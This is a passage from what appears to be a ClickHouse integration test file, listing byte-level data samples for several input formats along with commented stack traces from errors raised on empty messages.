'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes' : {
'data_sample' : [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp' : {
'data_sample' : [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': ", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native' : {
'data_sample': [
'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.cpp:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack' : {
'data_sample' : [
'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary' : {
'data_sample' : [
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes' : {
'data_sample' : [
'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
#''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf' : {
'data_sample' : [
'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC' : {
'data_sample' : [
'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1